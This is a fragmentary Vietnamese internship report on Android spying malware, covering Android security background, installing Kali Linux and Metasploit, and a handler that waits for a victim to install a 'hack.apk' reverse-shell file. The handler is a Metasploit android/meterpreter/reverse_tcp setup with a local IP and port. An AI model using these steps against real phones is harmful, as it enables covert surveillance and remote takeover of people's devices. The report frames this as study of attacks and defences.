BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN i

TRÍCH YẾU
Ngày nay, khoa học công nghệ ngày càng phát triển keo theo nhu cầu sử dụng công nghệ
của con ngƣời ngày càng tăng, đặc biệt là về lĩnh vực điện thoại di động với nhiều smartphone
ngày càng đƣợc sản xuất phát triển, để thỏa mãn đƣợc nhu cầu công nghệ của ngƣời dùng nhiều
hãng điện thoại lớn cho ra đời nhiều smartphone cao cấp chạy hệ điều hành android, iOS…Trong
đó đặc biệt là hệ điều hành android đƣợc nhiều hãng điện thoại sử dùng làm hệ điều hành cho
smartphone mà chĩnh hãng đó sản xuất ra. Cũng vì sự phổ biến và ngày càng phát triển của
android nên sự cạnh tranh cũng tăng và xuất hiện nhiều tình trạng đánh cắp thông tin ngƣời
dùng, xâm nhập quyền riêng tƣ của ngƣời nên vẫn đề bảo mật cho ngƣời dùng đƣợc đặt lên hang
đầu.
Trong thời gian thực tập tại Trung Tâm Athena từ ngày 01/07/2014 đến ngày 18/07/2014
với đề tài “Nghiên cứu các phần mềm cho phép nghe lén trên điện thoại android” đƣợc ứng dụng
vào thực tiễn nhiều đã giúp tôi hiểu rõ hơn về hệ điều hành android đề có thể nắm bắt cách tấn
công đánh cắp thông tin ngƣời dùng và biết đƣợc cách phòng tránh để góp phần đảm bảo cho
ngƣời sử dụng thấy an toàn hơn. Qua quá tình làm việc tại Trung Tâm tôi đã đƣợc tạo nhiều điều
kiện để hoàn thành, và tích lũy đƣơc nhiều kinh nghiệm cho bản thân cũng nhƣ biết đƣợc những
thiếu sót của bản thân để tôi ngày càng hoàn thiện hơn.
Tôi xin cam kết, kết quả đạt đƣợc là do tôi tự thực hiện dƣới sự hƣớng dẫn của thầy Võ
Đổ Thắng. Các bƣớc cần thiết đề hoàn thành đề tài đã đƣợc tôi ghi lại bằng một số video và có
thuyết minh. Một số video ghi lại quá trình thực hiện đƣợc liệt kê bên dƣới.
Danh sách các Video:
- Giới thiệu bản thân, cơ quan thực tập và để tài thực hiện
http://youtu.be/YKKSUzWRTjo
- Hƣớng dẫn cài đặt và nghiên cứu kali linux
http://youtu.be/P6RZR2p3RJc
- Hƣớng dẫn tạo mã độc trên kali linux (local) và mã độc trên VPS
http://youtu.be/5pkMrE0WWjA


SVTT: BÙI TỐ LUÂN iii

LỜI CẢM ƠN
TRUNG TÂM ATHENA

Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Athena, thầy Võ Đỗ Thắng và toàn
thể các anh, chị, các bạn trong Trung Tâm đã tận tình giúp đỡ em trong thời gian thực tập, tạo
điều kiện tốt nhất để em đƣợc thực tập tốt tại Trung Tâm. Qua đợt thực tập này em đã tích lũy
cho bản thân đƣợc nhiều kinh nghiệm quý báo, những kinh nghiệm đó sẽ giúp em hoàn thiện bản
thân hơn,và giúp em làm tốt công việc sau này.
Trong thời gian thực tập tại Trung Tâm em đã có những cố gắng để hoàn thành báo cao
thực tập một cách tốt nhất với tất cả những nổ lực của bản thân, nhƣng cũng không thể tránh khỏi
những thiếu sót trong quá trình thực tập, rất mong nhận đƣợc sự thông cảm của quý thầy cô ở
Trung Tâm và đặc biệt là Thầy Võ Đỗ Thắng.
Một lần nữa em xin chân thành cảm ơn
TP.Hồ Chí Minh, Ngày 12 Tháng 08 Năm 2014
Kí tên
Bùi Tố Luân

Hình chụp GVHD Võ Đỗ Thắng (bên phải) với SVTT Bùi Tố Luân (bên trái)


NHẬN XÉT CỦA GIÁO VIÊN HƢỚNG DẪN

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN vi

LỜI MỞ ĐẦU


I. Giới thiệu về Trung Tâm ATHENA 1
1. Lĩnh vực hoạt động chính 1
2. Đội ngũ giảng viên 1
3. Cơ sở vật chất 2
4. Dịch vụ hổ trợ 2
II. Giới thiệu đề tài, lý do chọn đề tài và giới thiệu về android, malware 3
1. Giới thiệu về android 3
a. Lịch sử phát triển của android 3
b. Bảo mật và quyền riêng tư. 4
2. Malware 5
a. Malware trên android 5
b. Ví dụ một malware trên android 6
III. Nội dung thực tập 7
1. Thực hiện trên local host 7
a. Cài đặt và nghiên cứu Kali (backtrack) 7
b. Cách tạo mã độc trên kali (Backtrack). 13
c. Cách triển khai mã độc xâm nhập vào android 14
2. Làm trên sever VPS (môi trường Internet) 16
a. Cài đặt Metasploit trên VPS 16
b. Tạo mã xâm nhập trên VPS 18
c. Xâm nhập vào android 18
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN viii

IV. Tổng kết 24
1. Kinh nghiệm đạt được 24
2. Kết quả đạt được sau khi thực tập 24
3. Hạn chế và khả năng mở rộng đề tài 24
4. Khả năng ứng dụng của đề tài vào thực tế 24

tin(VNISA), Viện Kỹ Thuật Quân Sự…
2. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trƣờng đại học hàng
đầu trong nƣớc… Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế nhƣ
MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sƣ phạm Quốc Tế(Microsoft
Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng
dạy tại trung tâm ATHENA.
Bên cạnh đó, Các giảng viên ATHENA thƣờng đi tu nghiệp và cập nhật kiến thức công
nghệ mới từ các nƣớc tiên tiến nhƣ Mỹ, Pháp, Hà Lan, Singapore… và truyền đạt các công
nghệ mới này trong các chƣơng trình đào tạo tại trung tâm ATHENA.

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 2

3. Cơ sở vật chất
Thiết bị đầy đủ và hiện đại
Các chƣơng trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ
mới nhất
Phòng máy rộng rãi, thoáng mát.
4. Dịch vụ hổ trợ
Đảm bảo việc làm cho học viên tốt nghiệp khóa dài hạn
Giới thiệu việc làm cho mọi học viên
Thực tập có lƣơng cho học viên khá giỏi
Ngoài giờ học chính thức, học viên đƣợc thực hành thêm miễn phí, không giới hạn thời
gian.
Hỗ trợ kĩ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng
máy tính, bảo mật mạng.
Hổ trợ thi chứng chỉ Quốc Tế
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

nhân linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà
mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp.
Google đã liên hệ với hàng loạt hãng phần cứng cũng nhƣ đối tác phần mềm, bắn tin cho
các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trƣờng điện thoại di động xuất
hiện trong tháng 12 năm 2006. Tin tức BBC và nhật báo phố Wall chú thích rằng Google
muốn đƣa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang
nổ lực làm việc để thực hiện điều này. Các phƣơng tiện truyền thông truyền thống lẫn
online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thƣơng
hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 4

mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho nhà sản xuất điện thoại di
động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của
Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực
điện thoại di động.
Ngày 5 tháng 11 năm 2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance),
một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn Broadcom,
Google, HTC, Intel, LG Tập đoàn Marwell Technology, Motorola, Nvidia, Qualcomm,
SamSung Electronics, Sprint Nextel và T-Mobile đƣợc thành lập với mục đích phát triển
các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng đƣợc ra mắt với vai trò
là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động đƣợc xây dựng trên
nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên đƣợc bán ra la HTC
Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu trƣng của hệ điều hành Android mới
là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
Từ năm 2008, Android đã trãi qua nhiều lần cập nhật để dần dần cải tiến hệ điều
hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trƣớc. Mỗi bản
nâng cấp đƣợc đặt tên lần lƣợt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng

Google hiện đang sử dụng bộ quét phần mềm ác ý Google Bouncer để theo dõi và
quét các ứng dụng trên cửa hàng Google Play. Nó sẽ đánh dấu các phần mềm bị nghi ngờ
và cảnh báo ngƣời dùng về những vấn đề có thể xảy ra trƣớc khi họ tải nó về máy.
Android phiên bản 4.2 Jelly Bean đƣợc phát hành năm 2012 cùng với các tính năng bảo
mật đƣợc cải thiện, bao gồm một bộ phận quét phần mềm ác ý đƣợc cài sẵn trong hệ
thống, hoạt động cùng với Google Play nhƣng cũng có thể quét các ứng dụng đƣợc cài
đặt từ nguồn thứ ba, và một hệ thống cảnh báo thông báo cho ngƣời dùng khi một ứng
dụng cố gắng gửi 1 tin nhắn vào số tính tiền, chặn tin nhắn đó lại trừ khi ngƣời dùng công
khai cho phép nó.
Điện thoại thông minh Android có khả năng báo cáo vị trí của điểm truy cập Wi-Fi,
phát hiện ra việc di chuyển của ngƣời dùng điện thoại, để xây dựng những cơ sở dữ liệu
có chứa vị trí của hàng trăm triệu điểm truy cập. Những cơ sở dữ liệu này tạo nên một
bản đồ điện tử để tìm vị trí điện thoại thông minh, cho phép chúng chạy ứng dụng nhƣ
Foursquare, Google Latitude, Facebook Places, và gửi những đoạn quảng cáo dựa trên vị
trí. Phần mềm theo dõi của bên thứ ba nhƣ TaintDroid, một dự án nghiên cứu trong
trƣờng đại học, đôi khi có thể biết đƣợc khi nào thông tin cá nhân bị gửi đi từ ứng dụng
đến các máy chủ đặt ở xa.
Bản chất mã nguồn mở của Android cho phép những nhà thầu bảo mật lấy những
thiết bị sẵn có rồi điều chỉnh để sử dụng ở mức độ bảo mật cao hơn.
2. Malware
a. Malware trên android
Các Malware (phần mềm độc hại) vốn dĩ không còn xa lạ gì với ngƣời dùng PC. Sự
lớn mạnh gần đây của các thiết bị di động mà đặc biệt là hệ điều hành android, đã khiến
Android trở thành mục tiêu mới để đánh cắp thông tin.
Malware viết tắt của cụm từ Malicious Sofware, là một phần mềm đƣợc thiết kế với
mục đích thâm nhập hoặc gây hƣ hỏng máy tính mà ngƣời sử dụng không hề hay biết.
Những ngƣời viết nó ban đầu chỉ tập trung vào máy tính, chủ yếu là Windows, và các OS
khác nhƣ Linux, MacOs … nhƣng không đáng kể. Tuy nhiên giờ đây với sự phát triển
ngày càng tăng của smartphone đang dần dần thay thế máy tính, vì thế nó trở thành mục
tiêu tấn công của Malware.

phần mềm) đƣợc đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có đƣợc
các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật
(up-to-date) đổi với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Mọi công cụ trong Kali đều tuân theo chính sách quản lý gói Debian, giúp đảm bảo rõ
ràng về mặt cấu trúc hệ thống tổng thể, và dễ dàng xem xét hoặc thay đổi mã nguồn của
các công cụ.
Tính tương thích kiên trúc (Có khả năng tƣơng thích với kiến trúc ARM)
Hổ trợ mạng không dây tốt hơn
Hổ trợ cho một số lƣợng lớn phần cứng bên trong các thiết bị mạng không dây hay
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá
mạng không dây
Khả năng tùy biến cao
Đối với giao diện ngƣời dùng có thể chọn cho mình nhiều loại nhƣ Gnome, Kde hoặc
Xfce tùy theo sở thích và thói quen sử dụng
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Mục đích của các nhà phát triển là duy trì và cung cấp các bản cập nhật mới nhất để
Kali trở thành sự lựa chọn tốt nhất cho bất cứ ai tìm kiếm một hệ điều hành Pentest, một
hệ điều hành dành cho công việc bảo mật chuyên nghiệp
Có nhiều tài liệu hướng dẫn

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 8

- Cài đặt Kali:
Để tiến hành cài đặt Kali, trƣớc hết cần phải tải về file ISO phiên bản mới nhất tại
trang chủ http://www.kali.org/downloads/, tại đây ta sẽ chọn và download phiên bản Kali
Linux 32 bit ISO

Sau khi đã download Kali về chúng ta tiến hành cài đặt, để tiến hành cài đặt chúng ta

SVTT: BÙI TỐ LUÂN 11

Bƣớc tiếp theo để mặc định là American English rồi click Continue đến bƣớc tiếp
theo ta nhập tên Hostname ta để mặc định là Kali và click Continue, yêu cầu nhập
Domain name ta để trống và click Continue.

Tiếp theo yêu cầu nhập passwords: tại khung Root passwords ta nhập pass mà ta
muốn sử dụng, tại khung Re-enter password to verify ta nhập lại pass vừa rồi. sau đó
click Continue.

Bƣớc tiếp này chọn time zone ta có thể để mặc định rồi click Continue, đến đây ta
chọn Guided – use entire disk rồi click Continue.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 12

Bƣớc tiếp ta để mặc định và chọn Continue, đến bƣớc tiếp theo ta chọn All file in
one partion (recommended for new users) rồi click Continue.

Khi đến bƣớc tiếp theo ta chọn Finish partitioning and write changes to disk rồi ta
click Continue và chuyển đến bƣớc tiếp theo ta chọn Yes rồi click Continue và chờ cài
đặt Kali

Sau khi cài đặt xong, chọn No ở Use a network mirror, và chọn Yes ở Boot-loader.
Và sau khi hoàn tất hết các phần thì khởi động lại, đến giao diện login ta nhập User là
root và passwork là pass ta đã đặt trong các bƣớc cài đặt Kali. Và nhƣ vậy là hoàn tất
quá trình cài đặt Kali linux trên Vmware.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 13
Chờ một lúc thì msfconsole load xong. Bây giờ ta tạo một handler để bắt tính hiệu truyền về
từ máy bị nhiễm mã độc. Ta gõ các lệnh sau ở Terminal.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.4 (ip trùng với địa chỉ ip lúc tạo file hack.apk)
set lport 5784 (port trùng với port lúc tạo file hack.apk)
exploit

Bây giờ ta chỉ việc chờ cho máy nhiễm file mã độc mà ta tạo ở trên, thì nhƣ vậy là ta
đã xong phần cách triển khai mã độc xâm nhập vào android.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 16

2. Làm trên sever VPS (môi trường Internet)
a. Cài đặt Metasploit trên VPS
Để cài đặt Metasploit trên VPS, trƣớc tiên ta tải file cài đặt Metsploit về từ trang chủ
http://www.rapid7.com/products/metasploit/download.jsp . Ta chọn phiên bản
Metasploit Community. Click vào DOWNLOAD METASPLOIT COMMUNITY để
tiến hành tải Metasploit về.

Sau khi đã tải file cài đặt về ta mở file cài đặt Metasploit lên và tiến hành cài đặt, ở
màn hình cài đặt mở lên ta Click Next, đến bƣớc tiếp theo ta chọn I accept the
agreement rồi click Next .
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 17